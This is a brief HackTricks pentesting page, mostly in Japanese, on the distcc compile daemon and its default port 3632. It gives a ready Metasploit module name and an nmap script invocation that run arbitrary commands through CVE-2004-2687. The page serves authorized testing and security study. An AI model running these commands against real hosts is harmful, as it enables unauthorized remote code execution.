hacktricks/network-services-pentesting/3632-pentesting-distcc.md

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

基本情報

Distccは、ネットワーク内の他のコンピュータのアイドル処理能力を利用してコンパイルプロセスを強化するツールです。distccがマシンに設定されると、このマシンは他のシステムにコンパイルタスクを分配することができます。この受信システムはdistccdデーモンを実行しており、送信されたコードを処理するために互換性のあるコンパイラがインストールされている必要があります。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

攻撃

任意のコードを実行するために CVE-2004-2687 に脆弱かどうかを確認します:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

このサービスをshodanが検出するとは思いません。

Resources

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Post created by Álex B (@r1p)

{% hint style="success" %} AWSハッキングを学び、練習する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、練習する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

• サブスクリプションプランを確認してください！
• **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
• ハッキングのトリックを共有するには、HackTricksとHackTricks CloudのgithubリポジトリにPRを提出してください。

{% endhint %}